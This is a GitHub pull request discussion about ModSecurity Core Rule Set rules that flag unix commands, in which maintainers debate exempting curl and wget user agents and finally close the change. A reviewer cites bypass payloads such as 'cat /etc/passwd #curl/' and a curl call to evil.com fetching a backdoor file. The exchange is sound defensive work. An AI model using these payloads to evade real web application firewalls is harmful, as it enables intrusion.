8000 fix: exclude well known user agents from unix commands by theseion · Pull Request #3190 · coreruleset/coreruleset · GitHub
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content

fix: exclude well known user agents from unix commands #3190

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Conversation

theseion
Copy link
Contributor
@theseion theseion commented Apr 4, 2023

User agents like curl and wget currently lead to false positives because they are valid in User-Agent headers.
This commit moves the matching against the User-Agent header of 932236 into a separate rule 932238, so that words like curl and wget are still treated as attacks in other payloads but are excluded for the User-Agent header checks.

In addition, the well known user agents are also excluded from rule 932237, which only matches against Referer and User-Agent. An additional rule was omitted for simplicities sake.

Fixes #3189.

@theseion theseion requested review from dune73, franbuehler and a team April 4, 2023 20:13
@theseion theseion force-pushed the 3189-do-not-match-curl-and-wget-in-user-agent-header branch 2 times, most recently from 8fba43a to 257975c Compare April 5, 2023 05:16
@emphazer
Copy link
Contributor
emphazer commented Apr 5, 2023

Hey Max, that looks like a great fix!
i will check it out!
thanks!

@dune73
Copy link
Member
dune73 commented Apr 5, 2023

This looks good to me. But I did not really check the details and the correct shifting of tests etc. Somebody should do that before we merge.

@theseion
Copy link
Contributor Author

I've rewritten this PR to use a more flexible approach. I didn't like that the exclusion also affected other targets.

Sorry, something went wrong.

@theseion
Copy link
Contributor Author

@dune73 @emphazer I'd appreciate it if you would take another look at this one.

@theseion theseion force-pushed the 3189-do-not-match-curl-and-wget-in-user-agent-header branch from c31ee53 to f1384da Compare April 16, 2023 13:38
@theseion
Copy link
Contributor Author

@airween I've tried to fix the comment rule of secrule-parser to allow comments before a chained rule but didn't succeed. Could you help me out?

@airween
Copy link
Contributor
airween commented Apr 17, 2023

This is just a quick review, and gives a workaround. We should discuss the syntax, because there isn't any restriction for comments between parts of chained rules.

First of all, this modification fixes the secrules-parser error:

1331,1334c1331,1334
<     # Regular expression generated from regex-assembly/932239-chain1.ra.
<     # To update the regular expression run the following shell script
<     # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
<     #   crs-toolchain regex update 932239-chain1
---
> # Regular expression generated from regex-assembly/932239-chain1.ra.
> # To update the regular expression run the following shell script
> # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
> #   crs-toolchain regex update 932239-chain1
15
8000
45,1548c1545,1548
<     # Regular expression generated from regex-assembly/932238-chain1.ra.
<     # To update the regular expression run the following shell script
<     # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
<     #   crs-toolchain regex update 932238-chain1
---
> # Regular expression generated from regex-assembly/932238-chain1.ra.
> # To update the regular expression run the following shell script
> # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
> #   crs-toolchain regex update 932238-chain1

As you can see, the solution is simply remove the white spaces from the beginning of comment lines.

This will prevent the next possible issue: rules-check.py would also triggered with this syntax.

The reason is simple: rules-check.py has a test case, namely it checks the indentation. That uses msc_pyparser's MSCWriter class, which writes the comments without any indentation.

If we want to allow the indents (rather we would expect them) before comments which are between parts of chained rules, we have to modified the msc_pyparser too.

This would not be a complicated modification IMHO, but I started to play with secrules_parser, but actually I couldn't fix this issue yet.

(This is what I tried:

@@ -157,8 +157,8 @@ Transformation:
 
         
 /* This is to take rule continuations (\\n) as comments */    
-Comment[ws='\t ']:
-    /\\\n|^\#.*$/;
+Comment[ws='\t ']:
+    /\\\n|^( |\t)*\#.*$/;

so I tried to add an optional whites space block before the comment; Unfortunately I don't see why isn't that works.)

@dune73
Copy link
Member
dune73 commented Apr 17, 2023

Went over it again. Still did not check out the tests in detail, but it looks good to me (outside of the test failing, obviously).

@theseion
Copy link
Contributor Author

Thanks @airween, I tried the same but didn't get it working. I'll just outdent the comments then.

@theseion theseion force-pushed the 3189-do-not-match-curl-and-wget-in-user-agent-header branch from 4cbaaec to aa728c2 Compare April 17, 2023 18:23
@airween
Copy link
Contributor
airween commented Apr 17, 2023

Thanks @airween, I tried the same but didn't get it working. I'll just outdent the comments then.

Hmm... it's very weird...

$ diff REQUEST-932-APPLICATION-ATTACK-RCE_3190.conf REQUEST-932-APPLICATION-ATTACK-RCE_3190_2.conf 
1331,1334c1331,1334
<     # Regular expression generated from regex-assembly/932239-chain1.ra.
<     # To update the regular expression run the following shell script
<     # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
<     #   crs-toolchain regex update 932239-chain1
---
> # Regular expression generated from regex-assembly/932239-chain1.ra.
> # To update the regular expression run the following shell script
> # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
> #   crs-toolchain regex update 932239-chain1
1545,1548c1545,1548
<     # Regular expression generated from regex-assembly/932238-chain1.ra.
<     # To update the regular expression run the following shell script
<     # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
<     #   crs-toolchain regex update 932238-chain1
---
> # Regular expression generated from regex-assembly/932238-chain1.ra.
> # To update the regular expression run the following shell script
> # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
> #   crs-toolchain regex update 932238-chain1

$ poetry run secrules-parser -c -f REQUEST-932-APPLICATION-ATTACK-RCE_3190.conf 
Syntax invalid: Syntax error in line 1331 col 5: Expected 'SecAction' or 'SecRuleScript' or 'SecRule' or 'SecMarker' or 'SecComponentSignature' or 'SecRuleRemoveById' or 'SecRuleRemoveBytag' or EOF at position /home/airween/src/secrules_parsing/REQUEST-932-APPLICATION-ATTACK-RCE_3190.conf:(1331, 5) => 'hain"     *# Regular '.

$ poetry run secrules-parser -c -f REQUEST-932-APPLICATION-ATTACK-RCE_3190_2.conf 
Syntax OK: REQUEST-932-APPLICATION-ATTACK-RCE_3190_2.conf

Of course, this works without any modification of secrule_parsing.

@airween
Copy link
Contributor
airween commented Apr 17, 2023

I tried the same but didn't get it working. I'll just outdent the comments then.

But now the test has passed. So it works, isn't it?

@theseion
Copy link
Contributor Author

Yes, I just outdented the comments.

User agents like `curl` and `wget` currently lead to false positives
because they are valid in `User-Agent` headers.
This commit moves the matching against the `User-Agent` header of 932236
into a separate rule 932238, so that words like `curl` and `wget` are
still treated as attacks in other payloads but are excluded for the
`User-Agent` header checks.

In addition, the well known user agents are also excluded from rule
932237, which only matches against `Referer` and `User-Agent`. An
additional rule was omitted for simplicities sake.
Instead of using `include-except` to exclude some command words, which
also affects matching against other headers, use separate rules and an
allow list with `@pmFromFile`.
@theseion theseion force-pushed the 3189-do-not-match-curl-and-wget-in-user-agent-header branch from 5bbd184 to deeb452 Compare April 23, 2023 18:01
@theseion
Copy link
Contributor Author

I'd love some feedback on this one. @emphazer or @theMiddleBlue maybe?

@emphazer
Copy link
Contributor

@theseion i already spend friday some time with this PR. I will give you feedback during the week ;-)

@theseion
Copy link
Contributor Author

Awesome, thank you!

# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
# crs-toolchain regex update 932239-chain1
#
SecRule REQUEST_HEADERS:User-Agent "!@pmFromFile benign-user-agents.data" \
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

isn't this opening a lot of bypasses for this specific rule? such as

cat /etc/passwd #curl/

I know, this would match other rules but the technique could be used in a more complicated bypass for this.

IMO any allow-list based on user-agent (or more in general based on user controlled input) should be removed.

Again, my unpopular opinion is: we should not inspect UA / Referer at PL1 and PL2 without matching an injection syntax. It will be always leads to FPs hard to exclude without removing the rule from the whole application.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yes, you are right of course. IMO, this rule is just there to filter some basic automated attacks. If you want the real deal you'll need to enable PL 3 probably. So the question is, would users benefit from this rule, even if it is trivial to bypass?

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

yes of course removing FPs it's a good thing and blocking RCE also. The problem IMO is that the allow list is too inclusive. As is, you'll have even unintended bypass like curl 'http://evil.com/curl/backdoor.txt' or something like.

Can we replace the first rule of the chain by using a regex? Something like @rx ^curl/[0-9.]+$

I see more problems with the unix-shell-* list. We're doing it as is to prevent something like system($useragent) in the protected application, but I think this is not something we can do at PL1 and PL2. It leads to a ton of FP and FN.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Can we replace the first rule of the chain by using a regex? Something like @rx ^curl/[0-9.]+$

Yes. Maybe that's better.

I see more problems with the unix-shell-* list. We're doing it as is to prevent something like system($useragent) in the protected application, but I think this is not something we can do at PL1 and PL2. It leads to a ton of FP and FN.

Do you mean in general or for this rule in particular? We had the unix-shell* lists before and they (sort of) worked...

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

in general, I think they worked well with an acceptable FP level until we start to match against UA and Referer request headers. This is just my opinion, I can continue to exclude UA and Referer from those rules. I'm just worried that using 4.0 at PL2 will be hard, if not impossible, for integrators.

Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Can you guys prepare this question for the chat on Monday? I think it deserves a thorough discussion.

# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
# crs-toolchain regex update 932238-chain1
#
SecRule REQUEST_HEADERS:User-Agent "!@pmFromFile benign-user-agents.data" \
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Same here, possible rule bypass

Copy link
Contributor
@franbuehler franbuehler left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

There are some open issues but I think the idea behind this PR makes sense!

@RedXanadu
Copy link
Member

I'm not sure the chain rule approach is a good idea, for the reasons already discussed by others.

I thought there was a crs-toolchain function to exclude unwanted keywords? Let's use that?

Or can we add a PL 3 rule, something like "Automated tooling detected", which picks up curl, wget, Go HTTP library UA, Perl HTTP library UA, etc. etc. and then CRS installers can switch off the rule if they want to allow such tooling to be used?

Sorry if this is too simplistic 😅 Maybe I'm missing something.

@franbuehler franbuehler self-assigned this Sep 4, 2023
@theseion theseion added the v4 Should go into release v4 label Sep 19, 2023
@theseion
Copy link
Contributor Author

As discussed, this approach doesn't work.

@theseion theseion closed this Sep 21, 2023
@RedXanadu
Copy link
Member
RedXanadu commented Sep 21, 2023

For posterity / future reference: this was picked up in #3189, go there for further discussion (correct me if I'm wrong).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
v4 Should go into release v4
Projects
None yet
Development

Successfully merging this pull request may close these issues.

curl and wget are matched in User-Agent header
7 participants
0